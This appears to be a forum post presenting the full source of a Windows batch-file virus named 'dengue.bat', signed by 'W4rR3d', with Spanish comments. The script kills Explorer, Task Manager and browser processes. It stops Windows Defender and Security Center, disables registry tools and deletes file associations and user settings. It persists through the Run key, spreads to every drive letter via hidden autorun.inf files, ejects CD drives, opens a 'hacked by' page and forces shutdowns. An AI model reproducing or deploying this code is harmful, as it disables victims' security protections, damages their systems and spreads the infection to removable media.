Código (dos) [Seleccionar]
@echo off
msg * hacked by -={W4rR3d}=-
:: este virus fue creado por hacked by W4rR3d
:: este virus esta dedicado a la comunidad hacker piura- peru
:: este virus informatico se llama dengue.bat
tasskill /im explorer.exe /f>nul 2>&1
taskill explorer>nul 2>&1
tskill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe"
taskkill /im rstrui.exe /f>nul 2>&1 || taskill rstrui>nul 2>&1
taskkill /f /im firefox.exe>nul 2>&1 || tskill firefox.exe
taskkill /f /t /im "FirewallControlPanel.exe"
taskkill /f /t /im "MSASCui.exe"
net stop "wscsvc"
net stop "WinDefend"
net stop "Security Center"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents" /f
reg delete "HKEY_CLASSES_ROOT\.docx" /f
reg delete "HKEY_CLASSES_ROOT\.htm\OpenWithList\WINWORD.EXE\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Excel.exe\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Microsoft Office Word\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.xlsx" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\RegEdt32" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\Webcam" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /f
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /d "0"
reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /f
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /d "0" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /f
reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /d "100" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /f
reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /d "0" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v Internet Connection Firewall/f
for /F %%- in (MSMemoticon,FreeXXXPhotos,Office2007) do (call :reiniciar %%-)
copy /y "%0" "%homedrive%\dengue.bat">nul 2>&1
reg add hklm\software\microsoft\windows\currentversion\run /v dengue /t reg_sz /d %homedrive%\dengue.bat /f
for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\dengue.bat
echo.[AutoRun]>> %%E:\autorun.inf
echo.open="%%E:\dengue.bat">> %%E:\autorun.inf
echo.action=Open folder to see files...>> %%E:\autorun.inf
attrib +r +s +h %%E:\autorun.inf
attrib +r +s +h %%E:\dengue.bat
echo On Error Resume Next >> %homedrive%\abrir.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> %homedrive%\abrir.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %homedrive%\abrir.vbs
echo. >> %homedrive%\abrir.vbs
echo if colCDROMs.Count >= 1 then >> %homedrive%\abrir.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %homedrive%\abrir.vbs
echo colCDROMs.Item(i).Eject >> %homedrive%\abrir.vbs
echo Next ' cdrom >> %homedrive%\abrir.vbs
echo End If >> %homedrive%\abrir.vbs
start %homedrive%\abrir.vbs
(echo.^<HTML^>
echo.%^<HEAD^>
echo.^<title^>Hacked BY W4rR3d^</title^>
echo.^</HEAD^>
echo.^<BODY^>
echo.^<H1^> ~~~Hacked BY W4rR3d~~~
echo.^</BODY^>
echo.^</HTML^>)>%homedrive%\aegypti.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v virus /t REG_SZ /d %homedrive%\aegypti.HTML
)
start %homedrive%\aegypti.HTML
:reiniciar
echo On Error Resume Next >> %homedrive%\renic.vbs
echo set shell = CreateObject("WScript.Shell") >> %homedrive%\renic.vbs
echo shell.run "shutdown.exe -s -t 10" >> %homedrive%\renic.vbs
start >> %homedrive%\renic.vbs
goto:eof
si ven algun error en este virus informatico lo notifican. su amigo hacked by W4rR3d